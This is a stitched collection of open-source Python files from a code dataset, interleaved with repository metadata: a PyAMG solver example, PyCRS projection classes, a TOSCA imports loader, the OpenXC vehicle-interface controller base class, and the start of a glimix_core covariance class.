# Solve Ax=b with no acceleration ('standalone' solver)
standalone_residuals = []
x = mls.solve(b, tol=1e-10, accel=None, residuals=standalone_residuals)
# Solve Ax=b with Conjugate Gradient (AMG as a preconditioner to CG)
accelerated_residuals = []
x = mls.solve(b, tol=1e-10, accel='cg', residuals=accelerated_residuals)
# Compute relative residuals
standalone_residuals = numpy.array(standalone_residuals)/standalone_residuals[0]
accelerated_residuals = numpy.array(accelerated_residuals)/accelerated_residuals[0]
# Compute (geometric) convergence factors
factor1 = standalone_residuals[-1]**(1.0/len(standalone_residuals))
factor2 = accelerated_residuals[-1]**(1.0/len(accelerated_residuals))
print " MG convergence factor: %g"%(factor1)
print "MG with CG acceleration convergence factor: %g"%(factor2)
# Plot convergence history
try:
import pylab
pylab.figure()
pylab.title('Convergence History')
pylab.xlabel('Iteration')
pylab.ylabel('Relative Residual')
pylab.semilogy(standalone_residuals, label='Standalone', linestyle='-', marker='o')
pylab.semilogy(accelerated_residuals, label='Accelerated', linestyle='-', marker='s')
pylab.legend()
pylab.show()
except ImportError:
print "\n\nNote: pylab not available on your system."
|
bsd-3-clause
| -2,089,875,078,849,389,000
| 39.134615
| 93
| 0.663153
| false
| 3.746858
| false
| false
| false
|
karimbahgat/PyCRS
|
pycrs/elements/projections.py
|
1
|
8280
|
"""
Named projection classes that can be created or parsed.
"""
def find(projname, crstype, strict=False):
"""
Search for a projection name located in this module.
Arguments:
- **projname**: The projection name to search for.
- **crstype**: Which CRS naming convention to search (different
CRS formats have different names for the same projection).
- **strict** (optional): If False, ignores minor name mismatches
such as underscore or character casing, otherwise must be exact
match (defaults to False).
"""
if not strict:
projname = projname.lower().replace(" ","_")
for itemname,item in globals().items():
if itemname.startswith("_"):
continue
try:
if hasattr(item.name, crstype):
itemname = getattr(item.name, crstype)
if not strict:
itemname = itemname.lower().replace(" ","_")
if projname == itemname:
return item
except:
pass
else:
return None
##+proj Projection name (see `proj -l`)
class Projection:
proj4 = "+proj"
ogc_wkt = "PROJECTION"
esri_wkt = "PROJECTION"
name = None
def __init__(self, **kwargs):
"""
A generic container for the specific projection used.
Args:
- **name**: A pycrs.projections.ProjName instance with the name given by each supported format.
"""
self.name = kwargs.get('name', self.name)
def to_proj4(self):
return "+proj=%s" %self.name.proj4
def to_ogc_wkt(self):
return 'PROJECTION["%s"]' %self.name.ogc_wkt
def to_esri_wkt(self):
return 'PROJECTION["%s"]' %self.name.esri_wkt
class ProjName:
def __init__(self, proj4="", ogc_wkt="", esri_wkt=""):
self.proj4 = proj4
self.ogc_wkt = ogc_wkt
self.esri_wkt = esri_wkt
# Specific predefined ellipsoid classes
class Robinson(Projection):
name = ProjName(
proj4 = "robin",
ogc_wkt = "Robinson",
esri_wkt = "Robinson",
)
class UTM(Projection):
name = ProjName(
proj4 = "utm",
ogc_wkt = "Transverse_Mercator",
esri_wkt = "Transverse_Mercator",
)
class ObliqueMercator(Projection):
name = ProjName(
proj4 = "omerc",
ogc_wkt = "Hotine_Oblique_Mercator_Two_Point_Natural_Origin", #"Hotine_Oblique_Mercator"
esri_wkt = "Hotine_Oblique_Mercator_Two_Point_Natural_Origin", #"Hotine_Oblique_Mercator_Azimuth_Natural_Origin"
)
class AlbersEqualArea(Projection):
name = ProjName(
proj4 = "aea",
ogc_wkt = "Albers_Conic_Equal_Area",
esri_wkt = "Albers",
)
class CylindricalEqualArea(Projection):
name = ProjName(
proj4 = "cea",
ogc_wkt = "Cylindrical_Equal_Area",
esri_wkt = "Cylindrical_Equal_Area",
)
class EquiDistantConic(Projection):
name = ProjName(
proj4 = "eqdc",
ogc_wkt = "Equidistant_Conic",
esri_wkt = "Equidistant_Conic",
)
class EquiDistantCylindrical(Projection):
# same as equirectangular...?
name = ProjName(
proj4 = "eqc",
ogc_wkt = "Equidistant_Cylindrical",
esri_wkt = "Equidistant_Cylindrical",
)
class EquiRectangular(Projection):
# same as equidistant cylindrical
name = ProjName(
proj4 = "eqc",
ogc_wkt = "Equirectangular",
esri_wkt = "Equirectangular",
)
class TransverseMercator(Projection):
name = ProjName(
proj4 = "tmerc",
ogc_wkt = "Transverse_Mercator",
esri_wkt = "Transverse_Mercator",
)
class GallStereographic(Projection):
name = ProjName(
proj4 = "gall",
ogc_wkt = "Gall_Stereographic",
esri_wkt = "Gall_Stereographic",
)
class Gnomonic(Projection):
name = ProjName(
proj4 = "gnom",
ogc_wkt = "Gnomonic",
esri_wkt = "Gnomonic",
)
class LambertAzimuthalEqualArea(Projection):
name = ProjName(
proj4 = "laea",
ogc_wkt = "Lambert_Azimuthal_Equal_Area",
esri_wkt = "Lambert_Azimuthal_Equal_Area",
)
class MillerCylindrical(Projection):
name = ProjName(
proj4 = "mill",
ogc_wkt = "Miller_Cylindrical",
esri_wkt = "Miller_Cylindrical",
)
class Mollweide(Projection):
name = ProjName(
proj4 = "moll",
ogc_wkt = "Mollweide",
esri_wkt = "Mollweide",
)
class ObliqueStereographic(Projection):
name = ProjName(
proj4 = "sterea",
ogc_wkt = "Oblique_Stereographic",
esri_wkt = "Oblique Stereographic", #"Stereographic_North_Pole"
)
class Orthographic(Projection):
name = ProjName(
proj4 = "ortho",
ogc_wkt = "Orthographic",
esri_wkt = "Orthographic",
)
class Stereographic(Projection):
name = ProjName(
proj4 = "stere",
ogc_wkt = "Stereographic",
esri_wkt = "Stereographic",
)
class PolarStereographic(Projection):
name = ProjName(
proj4 = "stere",
ogc_wkt = "Polar_Stereographic", # could also be just stereographic
esri_wkt = "Stereographic", # but also spelled with additional _South/North_Pole, for the same projection and diff params (maybe just for humans)?...
)
class Sinusoidal(Projection):
name = ProjName(
proj4 = "sinu",
ogc_wkt = "Sinusoidal",
esri_wkt = "Sinusoidal",
)
class VanDerGrinten(Projection):
name = ProjName(
proj4 = "vandg",
ogc_wkt = "VanDerGrinten",
esri_wkt = "Van_der_Grinten_I",
)
class LambertConformalConic(Projection):
name = ProjName(
proj4 = "lcc",
ogc_wkt = "Lambert_Conformal_Conic", # possible has some variants
esri_wkt = "Lambert_Conformal_Conic",
)
class Krovak(Projection):
name = ProjName(
proj4 = "krovak",
ogc_wkt = "Krovak",
esri_wkt = "Krovak",
)
class NearSidedPerspective(Projection):
name = ProjName(
proj4 = "nsper",
ogc_wkt = "Near_sided_perspective",
esri_wkt = "Near_sided_perspective", # not confirmed
)
class TiltedPerspective(Projection):
name = ProjName(
proj4 = "tsper",
ogc_wkt = "Tilted_perspective",
esri_wkt = "Tilted_perspective", # not confirmed
)
class InteruptedGoodeHomolosine(Projection):
name = ProjName(
proj4 = "igh",
ogc_wkt = "Interrupted_Goodes_Homolosine",
esri_wkt = "Interrupted_Goodes_Homolosine",
)
class Larrivee(Projection):
name = ProjName(
proj4 = "larr",
ogc_wkt = "Larrivee",
esri_wkt = "Larrivee", # not confirmed
)
class LamberEqualAreaConic(Projection):
name = ProjName(
proj4 = "leac",
ogc_wkt = "Lambert_Equal_Area_Conic",
esri_wkt = "Lambert_Equal_Area_Conic", # not confirmed
)
class Mercator(Projection):
name = ProjName(
proj4 = "merc",
ogc_wkt = "Mercator", # has multiple varieties
esri_wkt = "Mercator",
)
class ObliqueCylindricalEqualArea(Projection):
name = ProjName(
proj4 = "ocea",
ogc_wkt = "Oblique_Cylindrical_Equal_Area",
esri_wkt = "Oblique_Cylindrical_Equal_Area",
)
class Polyconic(Projection):
name = ProjName(
proj4 = "poly",
ogc_wkt = "Polyconic",
esri_wkt = "Polyconic",
)
class EckertIV(Projection):
name = ProjName(
proj4 = "eck4",
ogc_wkt = "Eckert_IV",
esri_wkt = "Eckert_IV",
)
class EckertVI(Projection):
name = ProjName(
proj4 = "eck6",
ogc_wkt = "Eckert_VI",
esri_wkt = "Eckert_VI",
)
class AzimuthalEquidistant(Projection):
name = ProjName(
proj4 = "aeqd",
ogc_wkt = "Azimuthal_Equidistant",
esri_wkt = "Azimuthal_Equidistant",
)
class GeostationarySatellite(Projection):
name = ProjName(
proj4 = "geos",
ogc_wkt = "Geostationary_Satellite",
esri_wkt = "Geostationary_Satellite",
)
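# --- Editor's hedged usage sketch (not part of the original module): exercises
# find() against the classes defined above; runs only when the module is
# executed directly.
if __name__ == "__main__":
    proj_cls = find("robin", "proj4")     # case-insensitive match on Robinson.name.proj4
    assert proj_cls is Robinson
    print(proj_cls().to_ogc_wkt())        # -> PROJECTION["Robinson"]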
|
mit
| -6,452,796,678,563,627,000
| 24.555556
| 157
| 0.577415
| false
| 3.220537
| false
| false
| false
|
superfluidity/RDCL3D
|
code/toscaparser/imports.py
|
1
|
14032
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import os
from toscaparser.common.exception import ExceptionCollector
from toscaparser.common.exception import InvalidPropertyValueError
from toscaparser.common.exception import MissingRequiredFieldError
from toscaparser.common.exception import UnknownFieldError
from toscaparser.common.exception import ValidationError
from toscaparser.elements.tosca_type_validation import TypeValidation
from toscaparser.utils.gettextutils import _
import toscaparser.utils.urlutils
import toscaparser.utils.yamlparser
YAML_LOADER = toscaparser.utils.yamlparser.load_yaml
log = logging.getLogger("tosca")
class ImportsLoader(object):
IMPORTS_SECTION = (FILE, REPOSITORY, NAMESPACE_URI, NAMESPACE_PREFIX) = \
('file', 'repository', 'namespace_uri',
'namespace_prefix')
def __init__(self, importslist, path, type_definition_list=None,
tpl=None, project=None):
self.project = project
self.importslist = importslist
self.custom_defs = {}
self.nested_tosca_tpls = []
if not path and not tpl:
msg = _('Input tosca template is not provided.')
log.warning(msg)
ExceptionCollector.appendException(ValidationError(message=msg))
self.path = path
self.repositories = {}
if tpl and tpl.get('repositories'):
self.repositories = tpl.get('repositories')
self.type_definition_list = []
if type_definition_list:
if isinstance(type_definition_list, list):
self.type_definition_list = type_definition_list
else:
self.type_definition_list.append(type_definition_list)
self._validate_and_load_imports()
def get_custom_defs(self):
return self.custom_defs
def get_nested_tosca_tpls(self):
return self.nested_tosca_tpls
def _validate_and_load_imports(self):
imports_names = set()
if not self.importslist:
msg = _('"imports" keyname is defined without including '
'templates.')
log.error(msg)
ExceptionCollector.appendException(ValidationError(message=msg))
return
for import_def in self.importslist:
if isinstance(import_def, dict):
for import_name, import_uri in import_def.items():
if import_name in imports_names:
msg = (_('Duplicate import name "%s" was found.') %
import_name)
log.error(msg)
ExceptionCollector.appendException(
ValidationError(message=msg))
imports_names.add(import_name)
full_file_name, custom_type = self._load_import_template(
import_name, import_uri)
namespace_prefix = None
if isinstance(import_uri, dict):
namespace_prefix = import_uri.get(
self.NAMESPACE_PREFIX)
if custom_type:
TypeValidation(custom_type, import_def)
self._update_custom_def(custom_type, namespace_prefix)
else: # old style of imports
full_file_name, custom_type = self._load_import_template(
None, import_def)
if custom_type:
TypeValidation(
custom_type, import_def)
self._update_custom_def(custom_type, None)
self._update_nested_tosca_tpls(full_file_name, custom_type)
def _update_custom_def(self, custom_type, namespace_prefix):
outer_custom_types = {}
for type_def in self.type_definition_list:
outer_custom_types = custom_type.get(type_def)
if outer_custom_types:
if type_def == "imports":
self.custom_defs.update({'imports': outer_custom_types})
else:
if namespace_prefix:
prefix_custom_types = {}
for type_def_key in outer_custom_types.keys():
namespace_prefix_to_key = (namespace_prefix +
"." + type_def_key)
prefix_custom_types[namespace_prefix_to_key] = \
outer_custom_types[type_def_key]
self.custom_defs.update(prefix_custom_types)
else:
self.custom_defs.update(outer_custom_types)
def _update_nested_tosca_tpls(self, full_file_name, custom_tpl):
if full_file_name and custom_tpl:
topo_tpl = {full_file_name: custom_tpl}
self.nested_tosca_tpls.append(topo_tpl)
def _validate_import_keys(self, import_name, import_uri_def):
if self.FILE not in import_uri_def.keys():
log.warning(_('Missing keyname "file" in import "%(name)s".')
% {'name': import_name})
ExceptionCollector.appendException(
MissingRequiredFieldError(
what='Import of template "%s"' % import_name,
required=self.FILE))
for key in import_uri_def.keys():
if key not in self.IMPORTS_SECTION:
log.warning(_('Unknown keyname "%(key)s" error in '
'imported definition "%(def)s".')
% {'key': key, 'def': import_name})
ExceptionCollector.appendException(
UnknownFieldError(
what='Import of template "%s"' % import_name,
field=key))
def _load_import_template(self, import_name, import_uri_def):
"""Handle custom types defined in imported template files
This method loads the custom type definitions referenced in "imports"
section of the TOSCA YAML template by determining whether each import
is specified via a file reference (by relative or absolute path) or a
URL reference.
Possibilities:
+----------+--------+------------------------------+
| template | import | comment |
+----------+--------+------------------------------+
| file | file | OK |
| file | URL | OK |
| preparsed| file | file must be a full path |
| preparsed| URL | OK |
| URL | file | file must be a relative path |
| URL | URL | OK |
+----------+--------+------------------------------+
"""
short_import_notation = False
if isinstance(import_uri_def, dict):
self._validate_import_keys(import_name, import_uri_def)
file_name = import_uri_def.get(self.FILE)
repository = import_uri_def.get(self.REPOSITORY)
repos = self.repositories.keys()
if repository is not None:
if repository not in repos:
ExceptionCollector.appendException(
InvalidPropertyValueError(
what=_('Repository is not found in "%s"') % repos))
else:
file_name = import_uri_def
repository = None
short_import_notation = True
if not file_name:
msg = (_('A template file name is not provided with import '
'definition "%(import_name)s".')
% {'import_name': import_name})
log.error(msg)
ExceptionCollector.appendException(ValidationError(message=msg))
return None, None
yaml_template = None
if toscaparser.utils.urlutils.UrlUtils.validate_url(file_name):
return file_name, YAML_LOADER(file_name, False)
elif not repository:
import_template = None
if self.path:
if toscaparser.utils.urlutils.UrlUtils.validate_url(self.path):
if os.path.isabs(file_name):
msg = (_('Absolute file name "%(name)s" cannot be '
'used in a URL-based input template '
'"%(template)s".')
% {'name': file_name, 'template': self.path})
log.error(msg)
ExceptionCollector.appendException(ImportError(msg))
return None, None
import_template = toscaparser.utils.urlutils.UrlUtils.\
join_url(self.path, file_name)
a_file = False
else:
a_file = True
main_a_file = os.path.isfile(self.path)
if main_a_file:
if os.path.isfile(file_name):
import_template = file_name
else:
full_path = os.path.join(
os.path.dirname(os.path.abspath(self.path)),
file_name)
if os.path.isfile(full_path):
import_template = full_path
else:
file_path = file_name.rpartition("/")
dir_path = os.path.dirname(os.path.abspath(
self.path))
if file_path[0] != '' and dir_path.endswith(
file_path[0]):
import_template = dir_path + "/" +\
file_path[2]
if not os.path.isfile(import_template):
msg = (_('"%(import_template)s" is'
'not a valid file')
% {'import_template':
import_template})
log.error(msg)
ExceptionCollector.appendException
(ValueError(msg))
else: # template is pre-parsed
id_name, file_extension = os.path.splitext(file_name)
if self.project is not None and id_name in self.project:
a_file = False
yaml_template = self.project[id_name]
import_template = file_name
elif os.path.isabs(file_name) and os.path.isfile(file_name):
a_file = True
import_template = file_name
else:
msg = (_('Relative file name "%(name)s" cannot be used '
'in a pre-parsed input template.')
% {'name': file_name})
log.error(msg)
ExceptionCollector.appendException(ImportError(msg))
return None, None
if not import_template:
log.error(_('Import "%(name)s" is not valid.') %
{'name': import_uri_def})
ExceptionCollector.appendException(
ImportError(_('Import "%s" is not valid.') %
import_uri_def))
return None, None
if yaml_template is not None:
#print yaml_template
return None, yaml_template
else:
return import_template, YAML_LOADER(import_template, a_file)
if short_import_notation:
log.error(_('Import "%(name)s" is not valid.') % import_uri_def)
ExceptionCollector.appendException(
ImportError(_('Import "%s" is not valid.') % import_uri_def))
return None, None
full_url = ""
if repository:
if self.repositories:
for repo_name, repo_def in self.repositories.items():
if repo_name == repository:
# Remove leading, ending spaces and strip
# the last character if "/"
repo_url = ((repo_def['url']).strip()).rstrip("//")
full_url = repo_url + "/" + file_name
if not full_url:
msg = (_('referenced repository "%(n_uri)s" in import '
'definition "%(tpl)s" not found.')
% {'n_uri': repository, 'tpl': import_name})
log.error(msg)
ExceptionCollector.appendException(ImportError(msg))
return None, None
if toscaparser.utils.urlutils.UrlUtils.validate_url(full_url):
return full_url, YAML_LOADER(full_url, False)
else:
msg = (_('repository url "%(n_uri)s" is not valid in import '
'definition "%(tpl)s".')
% {'n_uri': repo_url, 'tpl': import_name})
log.error(msg)
ExceptionCollector.appendException(ImportError(msg))
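# --- Editor's hedged usage sketch (commented out because it needs real
# template files on disk; the file names and the 'node_types' key are
# illustrative only, while the constructor arguments mirror __init__ above):
#
#     imports_def = [{'custom_types': {'file': 'custom_definitions.yaml'}}]
#     loader = ImportsLoader(imports_def, path='/path/to/main_template.yaml',
#                            type_definition_list=['node_types'])
#     custom_defs = loader.get_custom_defs()
#     nested_tpls = loader.get_nested_tosca_tpls()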
|
apache-2.0
| 8,705,253,170,228,588,000
| 46.087248
| 79
| 0.498788
| false
| 4.815374
| false
| false
| false
|
openxc/openxc-python
|
openxc/controllers/base.py
|
1
|
18242
|
"""Contains the abstract interface for sending commands back to a vehicle
interface.
"""
import numbers
import time
import threading
import binascii
try:
    # Python 2
    from Queue import Queue
    from Queue import Empty
except ImportError:
# Python 3
from queue import Queue
from queue import Empty
class ResponseReceiver(object):
"""All commands to a vehicle interface are asynchronous. This class is used to
wait for the response for a particular request in a thread. Before making a
request, a ResponseReceiver is created to wait for the response. All
responses received from the VI (which may or may not be in response to this
particular command) are passed to the ResponseReceiver, until it either
times out waiting or finds a matching response.
    The synchronization mechanism is a thread-safe Queue. The
ResponseReceiver blocks waiting on a new response to be added to the queue,
and the vehicle interface class puts newly received responses in the queues
of ResponseReceivers as they arrive.
"""
COMMAND_RESPONSE_TIMEOUT_S = 0.5
def __init__(self, queue, request, quit_after_first=True):
"""Construct a new ResponseReceiver.
queue - A multithreading queue that this receiver will pull potential responses from.
request - The request we are trying to match up with a response.
"""
self.diag_dict = {}
self.request = request
self.queue = queue
self.responses = []
self.running = True
self.quit_after_first = quit_after_first
def _response_matches_request(self, response):
"""Inspect the given response and return true if it's a response to this
ResponseReceiver's request.
This implementation is the base class no-op - it returns True for any
response. You probably want to override this in a subclass.
response - the response to inspect.
"""
return True
def wait_for_responses(self):
"""Block the thread and wait for the response to the given request to
arrive from the VI. If no matching response is received in
COMMAND_RESPONSE_TIMEOUT_S seconds, returns anyway.
"""
self.thread.join(self.COMMAND_RESPONSE_TIMEOUT_S)
self.running = False
return self.responses
def start(self):
self.thread = threading.Thread(target=self.handle_responses)
self.thread.start()
def handle_responses(self):
"""Block and wait for responses to this object's original request, or
until a timeout (self.COMMAND_RESPONSE_TIMEOUT_S).
This function is handy to use as the target function for a thread.
        The responses received (an empty list if none arrived before the
        timeout) are stored at self.responses.
"""
while self.running:
try:
response = self.queue.get(
timeout=self.COMMAND_RESPONSE_TIMEOUT_S)
if self._response_matches_request(response):
if type(self) == DiagnosticResponseReceiver:
if self._response_is_multiframe(response):
if response['id'] in self.diag_dict:
self.diag_dict[response['id']].addFrame(response)
else:
self.diag_dict[response['id']] = MultiframeDiagnosticMessage(response)
if self._return_final(response):
self.responses.append(self.diag_dict[response['id']].getResponse())
self.diag_dict.pop(response['id'])
self.responses.append(response)
if self.quit_after_first:
self.running = False
self.queue.task_done()
except Empty:
break
class MultiframeDiagnosticMessage:
def __init__(self, response):
self.id = response['id'] - 16
self.mode = response['mode']
self.bus = response['bus']
self.pid = response['pid']
self.payload = '0x' + response['payload'][8:]
def addFrame(self, response):
self.payload += response['payload'][8:]
def getResponse(self):
request = {
'timestamp': 0,
'bus': self.bus,
'id': self.id,
'mode': self.mode,
'success': True,
'pid': self.pid,
'payload': self.payload
}
return request
class CommandResponseReceiver(ResponseReceiver):
"""A receiver that matches the 'command' field in responses to the
original request.
"""
def _response_matches_request(self, response):
"""Return true if the 'command' field in the response matches the
original request.
"""
return response.get('command_response', None) == self.request['command']
class DiagnosticResponseReceiver(ResponseReceiver):
"""A receiver that matches the bus, ID, mode and PID from a
diagnostic request to an incoming response.
"""
def __init__(self, queue, request):
super(DiagnosticResponseReceiver, self).__init__(queue, request,
quit_after_first=False)
# Make sure to key off of the diagnostic request, not the command to
# create the request
self.diagnostic_request = request['request']
def _response_matches_request(self, response):
"""Return true if the response is to a diagnostic request, and the bus,
id, mode match. If the request was successful, the PID echo is also
checked.
"""
# Accept success/failure command responses
if super(DiagnosticResponseReceiver,
self)._response_matches_request(response):
return True
if ('bus' in self.diagnostic_request and
response.get('bus', None) != self.diagnostic_request['bus']):
return False
if (self.diagnostic_request['id'] != 0x7df and
response.get('id', None) != self.diagnostic_request['id']):
return False
if (response.get('success', True) and
response.get('pid', None) !=
self.diagnostic_request.get('pid', None)):
return False
return response.get('mode', None) == self.diagnostic_request['mode']
def _response_is_multiframe(self, response):
if 'frame' in response:
return True
return False
def _return_final(self, response):
if response['frame'] == -1:
return True
return False
class Controller(object):
"""A Controller is a physical vehicle interface that accepts commands to be
    sent back to the vehicle. This class is abstract, and implementations of the
interface must define at least the ``write_bytes`` method.
"""
def _prepare_response_receiver(self, request,
receiver_class=CommandResponseReceiver):
queue = Queue()
self.open_requests = getattr(self, 'open_requests', [])
self.open_requests.append(queue)
receiver = receiver_class(queue, request)
receiver.start()
        # Give it a brief moment to get started so we make sure we get the response
time.sleep(.2)
return receiver
def complex_request(self, request, wait_for_first_response=True):
"""Send a compound command request to the interface over the normal data
channel.
request - A dict storing the request to send to the VI. It will be
serialized to the currently selected output format.
wait_for_first_response - If true, this function will block waiting for
a response from the VI and return it to the caller. Otherwise, it
will send the command and return immediately and any response will
be lost.
"""
receiver = self._prepare_response_receiver(request,
receiver_class=CommandResponseReceiver)
self._send_complex_request(request)
responses = []
if wait_for_first_response:
responses = receiver.wait_for_responses()
return responses
def _send_complex_request(self, request):
self.write_bytes(self.streamer.serialize_for_stream(request))
@classmethod
def _build_diagnostic_request(cls, id, mode, bus=None, pid=None,
frequency=None, payload=None, decoded_type=None):
request = {
'command': "diagnostic_request",
'request': {
'id': id,
'mode': mode
}
}
if bus is not None:
request['request']['bus'] = bus
request['request']['mode'] = mode
if payload is not None and len(payload) > 0:
# payload must be a bytearray
request['request']['payload'] = "0x%s" % binascii.hexlify(payload)
if pid is not None:
request['request']['pid'] = pid
if frequency is not None:
request['request']['frequency'] = frequency
if decoded_type is not None:
request['request']['decoded_type'] = decoded_type
return request
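    # --- Editor's hedged note (the ID/PID values are illustrative only, not
    # from the original source): for a functional OBD-II request the builder
    # above produces, for example,
    #
    #     Controller._build_diagnostic_request(0x7df, 1, bus=1, pid=12)
    #     # -> {'command': 'diagnostic_request',
    #     #     'request': {'id': 2015, 'mode': 1, 'bus': 1, 'pid': 12}}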
def delete_diagnostic_request(self, id, mode, bus=None, pid=None):
request = self._build_diagnostic_request(id, mode, bus, pid)
request['action'] = 'cancel'
return self._check_command_response_status(request)
def create_diagnostic_request(self, id, mode, bus=None, pid=None,
frequency=None, payload=None, wait_for_ack=True,
wait_for_first_response=False, decoded_type=None):
"""Send a new diagnostic message request to the VI
Required:
id - The message ID (arbitration ID) for the request.
mode - the diagnostic mode (or service).
Optional:
bus - The address of the CAN bus controller to send the request, either
1 or 2 for current VI hardware.
pid - The parameter ID, or PID, for the request (e.g. for a mode 1
request).
frequency - The frequency in hertz to add this as a recurring diagnostic
requests. Must be greater than 0, or None if it is a one-time
request.
payload - A bytearray to send as the request's optional payload. Only
single frame diagnostic requests are supported by the VI firmware in
the current version, so the payload has a maximum length of 6.
wait_for_ack - If True, will wait for an ACK of the command message.
wait_for_first_response - If True, this function will block waiting for
a diagnostic response to be received for the request. It will return
either after timing out or after 1 matching response is received -
there may be more responses to functional broadcast requests that
arrive after returning.
Returns a tuple of
([list of ACK responses to create request],
[list of diagnostic responses received])
"""
request = self._build_diagnostic_request(id, mode, bus, pid,
frequency, payload, decoded_type)
diag_response_receiver = None
if wait_for_first_response:
diag_response_receiver = self._prepare_response_receiver(
request, DiagnosticResponseReceiver)
request['action'] = 'add'
ack_responses = self.complex_request(request, wait_for_ack)
diag_responses = None
if diag_response_receiver is not None:
diag_responses = diag_response_receiver.wait_for_responses()
return ack_responses, diag_responses
def _check_command_response_status(self, request):
responses = self.complex_request(request)
return len(responses) > 0 and responses[0]['status']
def set_passthrough(self, bus, enabled):
"""Control the status of CAN message passthrough for a bus.
Returns True if the command was successful.
"""
request = {
"command": "passthrough",
"bus": bus,
"enabled": enabled
}
return self._check_command_response_status(request)
def set_payload_format(self, payload_format):
"""Set the payload format for messages sent to and from the VI.
Returns True if the command was successful.
"""
request = {
"command": "payload_format",
"format": payload_format
}
status = self._check_command_response_status(request)
# Always change the format regardless because if it was already in the
# right format, the command will have failed.
self.format = payload_format
return status
def rtc_configuration(self, unix_time):
"""Set the Unix time if RTC is supported on the device.
Returns True if the command was successful.
"""
request = {
"command": "rtc_configuration",
"unix_time": unix_time
}
status = self._check_command_response_status(request)
return status
def modem_configuration(self, host, port):
"""Set the host:port for the Cellular device to send data to.
Returns True if the command was successful.
"""
request = {
"command": "modem_configuration",
"host": host,
"port": port
}
status = self._check_command_response_status(request)
return status
def set_acceptance_filter_bypass(self, bus, bypass):
"""Control the status of CAN acceptance filter for a bus.
Returns True if the command was successful.
"""
request = {
"command": "af_bypass",
"bus": bus,
"bypass": bypass
}
return self._check_command_response_status(request)
def set_predefined_obd2_requests(self, enabled):
"""Control if pre-defined OBD2 requests should be sent.
Returns True if the command was successful.
"""
request = {
"command": "predefined_obd2",
"enabled": enabled
}
return self._check_command_response_status(request)
def _check_command_response_message(self, request):
responses = self.complex_request(request)
result = None
if len(responses) > 0:
result = responses[0].get('message')
return result
def version(self):
"""Request a firmware version identifier from the VI.
"""
request = {
"command": "version"
}
return self._check_command_response_message(request)
def platform(self):
"""Request the VI platform.
"""
request = {
"command": "platform"
}
return self._check_command_response_message(request)
def sd_mount_status(self):
"""Request for SD Mount status if available.
"""
request = {
"command": "sd_mount_status"
}
responses = self.complex_request(request)
result = None
if len(responses) > 0:
result = responses[0].get('status')
return result
def device_id(self):
"""Request the unique device ID of the attached VI.
"""
request = {
"command": "device_id"
}
return self._check_command_response_message(request)
def write(self, **kwargs):
"""Serialize a raw or translated write request and send it to the VI,
following the OpenXC message format.
"""
if 'id' in kwargs and 'data' in kwargs:
result = self.write_raw(kwargs['id'], kwargs['data'],
bus=kwargs.get('bus', None),
frame_format=kwargs.get('frame_format', None))
else:
result = self.write_translated(kwargs['name'], kwargs['value'],
event=kwargs.get('event', None))
return result
def write_translated(self, name, value, event=None):
"""Send a translated write request to the VI.
"""
data = {'name': name}
if value is not None:
data['value'] = self._massage_write_value(value)
if event is not None:
            data['event'] = self._massage_write_value(event)
message = self.streamer.serialize_for_stream(data)
bytes_written = self.write_bytes(message)
assert bytes_written == len(message)
return bytes_written
def write_raw(self, id, data, bus=None, frame_format=None):
"""Send a raw write request to the VI.
"""
if not isinstance(id, numbers.Number):
try:
id = int(id, 0)
except ValueError:
raise ValueError("ID must be numerical")
data = {'id': id, 'data': data}
if bus is not None:
data['bus'] = bus
if frame_format is not None:
data['frame_format'] = frame_format
message = self.streamer.serialize_for_stream(data)
bytes_written = self.write_bytes(message)
assert bytes_written == len(message)
return bytes_written
def stop(self):
pass
def write_bytes(self, data):
"""Write the bytes in ``data`` to the controller interface."""
raise NotImplementedError("Don't use Controller directly")
@classmethod
def _massage_write_value(cls, value):
"""Convert string values from command-line arguments into first-order
Python boolean and float objects, if applicable.
"""
if not isinstance(value, numbers.Number):
if value == "true":
value = True
elif value == "false":
value = False
elif value[0] == '"' and value[-1] == '"':
value = value[1:-1]
else:
try:
value = float(value)
except ValueError:
pass
return value
class ControllerError(Exception):
pass
|
bsd-3-clause
| -6,919,577,415,630,533,000
| 35.338645
| 102
| 0.592589
| false
| 4.589182
| false
| false
| false
|
apenchev/tangowithdjango
|
rango/migrations/0001_initial.py
|
1
|
1093
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(unique=True, max_length=128)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Page',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=128)),
('url', models.URLField()),
('views', models.IntegerField(default=0)),
('category', models.ForeignKey(to='rango.Category')),
],
options={
},
bases=(models.Model,),
),
]
|
mit
| 5,240,946,657,495,729,000
| 29.388889
| 114
| 0.508692
| false
| 4.690987
| false
| false
| false
|
glimix/limix-inference
|
glimix_core/cov/_eye.py
|
1
|
2215
|
from numpy import exp, eye, log
from optimix import Function, Scalar
from .._util import format_function
class EyeCov(Function):
"""
Identity covariance function, K = s·I.
The parameter s is the scale of the matrix.
Example
-------
.. doctest::
>>> from glimix_core.cov import EyeCov
>>>
>>> cov = EyeCov(2)
>>> cov.scale = 2.5
>>> print(cov.value())
[[2.5 0. ]
[0. 2.5]]
>>> g = cov.gradient()
>>> print(g['logscale'])
[[2.5 0. ]
[0. 2.5]]
>>> cov.name = "I"
>>> print(cov)
EyeCov(dim=2): I
scale: 2.5
Parameters
----------
dim : int
Matrix dimension, d.
"""
def __init__(self, dim):
"""
Constructor.
Parameters
----------
dim : int
Matrix dimension, d.
"""
self._dim = dim
self._I = eye(dim)
self._logscale = Scalar(0.0)
Function.__init__(self, "EyeCov", logscale=self._logscale)
self._logscale.bounds = (-20.0, +10)
@property
def scale(self):
"""
Scale parameter.
"""
return exp(self._logscale)
@scale.setter
def scale(self, scale):
from numpy_sugar import epsilon
scale = max(scale, epsilon.tiny)
self._logscale.value = log(scale)
@property
def dim(self):
"""
Dimension of the matrix, d.
It corresponds to the number of rows and to the number of columns.
"""
return self._I.shape[0]
def value(self):
"""
Covariance matrix.
Returns
-------
K : ndarray
